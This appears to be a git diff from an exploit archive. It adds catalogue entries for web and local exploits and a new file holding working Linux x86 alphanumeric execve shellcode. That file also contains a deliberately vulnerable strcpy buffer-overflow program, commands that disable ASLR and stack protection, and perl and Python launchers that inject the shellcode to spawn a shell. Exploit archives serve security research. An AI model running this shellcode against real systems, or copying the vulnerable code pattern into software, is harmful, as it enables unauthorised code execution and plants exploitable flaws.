Escalation",2003-04-14,KuRaK,local,linux, 
@@ -10862,6 +10882,8 @@ id,file,description,date,author,type,platform,port
 47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
 47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
 47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
+47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
+47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42150,3 +42172,13 @@ id,file,description,date,author,type,platform,port
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,
 47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php,
 47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php,
+47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php,
+47847,exploits/php/webapps/47847.txt,"Complaint Management System 4.0 - 'cid' SQL injection",2020-01-06,FULLSHADE,webapps,php,
+47850,exploits/hardware/webapps/47850.txt,"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting",2020-01-06,"Ismail Tasdelen",webapps,hardware,
+47851,exploits/php/webapps/47851.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)",2020-01-06,"Ismail Tasdelen",webapps,php,
+47854,exploits/php/webapps/47854.txt,"Hostel Management System 2.0 - 'id' SQL Injection",2020-01-06,FULLSHADE,webapps,php,
+47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php,
+47874,exploits/php/webapps/47874.txt,"Small CRM 2.0 - Authentication Bypass",2020-01-06,FULLSHADE,webapps,php,
+47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php,
+47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php,
+47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index a4628419e..44ffa6119 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1010,3 +1010,4 @@ id,file,description,date,author,type,platform
 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
 47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
+47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
diff --git a/shellcodes/linux/47877.c b/shellcodes/linux/47877.c
new file mode 100644
index 000000000..5bfdd9cf0
--- /dev/null
+++ b/shellcodes/linux/47877.c
@@ -0,0 +1,109 @@ +# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) +# Date: 2019-12-31 +# Shellcode Author: bolonobolo +# Tested on: Linux x86 + +######################## execve.asm ############################### +global _start + +section .text +_start: + + ; int 0x80 ------------ + push 0x30 + pop eax + xor al, 0x30 + push eax + pop edx + dec eax + xor ax, 0x4f73 + xor ax, 0x3041 + push eax + push edx + pop eax + ;---------------------- + push edx + push 0x68735858 + pop eax + xor ax, 0x7777 + push eax + push 0x30 + pop eax + xor al, 0x30 + xor eax, 0x6e696230 + dec eax + push eax + + ; pushad/popad to place /bin/sh in EBX register + push esp + pop eax + push edx + push ecx + push ebx + push eax + push esp + push ebp + push esi + push edi + popad + push eax + pop ecx + push ebx + + xor al, 0x4a + xor al, 0x41 + +######################## ASCII string ########################## + +j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A + +########################## bof.c #################### + +#include +#include +#include + + int main(int argc, char *argv[]){ + char buffer[128]; + strcpy(buffer, argv[1]); + return 0; + } + + +When you test it on new kernels remember to disable the +randomize_va_space and to compile the C program with execstack enabled +and the stack protector disabled + +# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf' +# sysctl -p +# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g +bof.c -o bof + + +################################################################### + +./bof `perl -e 'print "\x90"x48 . +"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" . +"D"x16 . "\xff\xe4" . 
"\x79\xf7\xff\xbf"'` + +The \x79\xf7\xff\xbf may change, you must find yourself an address in +the NOP befor the shellcode + +#################### alpha.py ############################ + +#!/usr/bin/python +import os + +print "[*] Loading NOP" +z = "\x90"*48 +print "[*] Loading alphanumeric" +z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" +print "[*] Loading syscall" +z += "D"*16 +print "[*] Loading JMP and landing address" +z += "\xff\xe4\x79\xf7\xff\xbf" +print "[*] Popping the shell..." +os.system("./bof " + z) + + +################################################################## \ No newline at end of file